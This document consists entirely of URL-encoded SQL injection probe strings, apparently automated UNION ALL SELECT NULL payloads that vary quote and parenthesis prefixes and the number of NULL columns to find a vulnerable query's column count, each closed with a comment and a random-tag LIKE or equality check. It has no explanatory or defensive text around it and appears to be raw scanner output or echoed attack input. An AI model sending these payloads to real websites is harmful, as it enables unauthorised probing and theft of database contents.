1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27vPOq%27%20LIKE%20%27vPOq 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27mjwp%27%20LIKE%20%27mjwp 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27EcSr%27%20LIKE%20%27EcSr 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dyEs%27%20LIKE%20%27dyEs 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27aWzt%27%20LIKE%20%27aWzt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22fAtm%22%3D%22fAtm 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22URHK%22%3D%22URHK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22aLqu%22%3D%22aLqu 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22hxxF%22%3D%22hxxF 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22zXSJ%22%3D%22zXSJ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22pyzZ%22%3D%22pyzZ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22jAIo%22%3D%22jAIo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22MRXg%22%3D%22MRXg 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22zhvb%22%3D%22zhvb 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Ugrn%22%3D%22Ugrn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22LZql%22%3D%22LZql 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22GPto%22%3D%22GPto 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22jClu%22%3D%22jClu 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22HtXB%22%3D%22HtXB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22SfcF%22%3D%22SfcF 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Dtqc%22%3D%22Dtqc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22zQOI%22%3D%22zQOI 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22wAHy%22%3D%22wAHy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22PvAy%22%3D%22PvAy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22fQWl%22%3D%22fQWl 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22kGRZ%22%3D%22kGRZ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22vQpL%22%3D%22vQpL 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22IOei%22%3D%22IOei 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22qCqE%22%3D%22qCqE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22JIfZ%22%3D%22JIfZ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22SIFE%22%3D%22SIFE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22lPar%22%3D%22lPar 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22XkMS%22%3D%22XkMS 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22OChM%22%3D%22OChM 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22fmCc%22%3D%22fmCc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Qfbv%22%3D%22Qfbv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22zHIl%22%3D%22zHIl 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Fmjc%22%3D%22Fmjc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22lRsh%22%3D%22lRsh 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Vnex%22%3D%22Vnex 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wIFc%22%3D%22wIFc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22TAoc%22%3D%22TAoc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22IQne%22%3D%22IQne 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22cGVW%22%3D%22cGVW 